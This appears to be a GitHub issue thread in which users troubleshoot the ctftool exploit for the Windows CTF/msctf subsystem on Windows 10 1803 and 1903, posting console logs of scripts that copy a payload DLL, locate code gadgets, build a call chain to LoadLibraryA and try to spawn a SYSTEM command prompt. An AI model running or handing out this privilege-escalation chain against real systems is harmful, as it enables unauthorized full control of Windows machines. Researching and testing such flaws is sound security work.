cmd not spawned in win 10 1803

[J1nchur1k1]

all is going well, just the cmd is not getting spawned on the locked screen.

Below are the artifacts for the same

ctf> script scripts\ctf-logonui-system.ctf
Attempting to copy exploit payload...
C:payload64.dll
1 File(s) copied

The screen will lock to trigger the login screen in 5 seconds...
Closing existing ALPC Port Handle 0000023C...
The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon1
Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon1, Handle 0000023C
Client 0, Tid 5792 (Flags 0000, Hwnd 000016A0, Pid 3032, ctftool.exe)
Client 1, Tid 9196 (Flags 0x1000000c, Hwnd 000023EC, Pid 3044, LogonUI.exe)
Found new client LogonUI.exe, DefaultThread now 9196
ReleaseId is 1803
Guessed msvcrt => C:\WINDOWS\system32\msvcrt.DLL
Found Gadget 48895C... in module msvcrt at offset 0x30c20
C:\WINDOWS\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400
C:\WINDOWS\system32\kernel32.DLL->.data->VirtualAddress is 0x0a8000
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 01429368, Type 0x106, Size 0x18, Offset 0x40)
000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C
000010: 01 00 00 00 43 c4 1f 00 ....C...
Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x1fc443
0x7ffdf3270000
0x7ffdf3a30000
0x7ffdf38b0000
Guessed msctf => C:\WINDOWS\system32\msctf.DLL
Found Gadget 488b41... in module msctf at offset 0xc3550
C:\WINDOWS\system32\msctf.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\msctf.DLL->.text->PointerToRawData is 0x000400
0x7ffdf3a30000
Guessed kernel32 => C:\WINDOWS\system32\kernel32.DLL
C:\WINDOWS\system32\kernel32.DLL is a 64bit module.
kernel32!LoadLibraryA@0x180000000+0x1e090
The CFG call chain is built, writing in parameters...
Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
0x7ffdf33d0000
Guessed combase => C:\WINDOWS\system32\combase.DLL
Found Gadget 488b49... in module combase at offset 0x1d9270
C:\WINDOWS\system32\combase.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\combase.DLL->.text->PointerToRawData is 0x000400
Payload created and call chain ready, get ready...

Exploit complete.

[MrKcyre]

Same here, i tried at my company test computers, 1903 and 1803 without August patch and cmd did not spawned.. 🤔 i'm wondering whats the issue

[taviso]

Can you try the scripts\ctf-consent-system.ctf script instead?

[J1nchur1k1]

Sure taviso, will give you output about the same.

[J1nchur1k1]

I have tested with it.... it spawned me a cmd, but as soon as I did whoami, it gave me same user, rather that NT-authority.

ctf> script scripts\ctf-consent-system.ctf
Attempting to copy exploit payload...
C:payload64.dll
1 File(s) copied

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!! YOU DONT NEED TO KNOW ANY PASSWORD, JUST WAIT! !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

PromptOnSecureDesktop is 0
Closing existing ALPC Port Handle 00000234...
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 000002D4
Waiting for the consent dialog to join the session...